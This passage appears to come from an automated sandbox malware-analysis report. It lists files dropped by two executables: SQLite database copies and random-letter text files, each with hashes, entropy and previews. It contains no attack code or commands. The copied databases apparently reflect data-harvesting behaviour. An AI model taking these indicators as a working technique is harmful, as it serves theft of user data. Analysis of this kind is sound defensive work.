                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):40960
                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):106496
                                                                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.694985340190863
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.692693183518806
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                Process:C:\Users\user\Desktop\Uv4EriqDCj.exe
                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1026
                                                                                                                                                Entropy (8bit):4.694985340190863
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                                                                                                MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                                                                                                SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                                                                                                SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                                                                                                SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                                                                                                Malicious:false
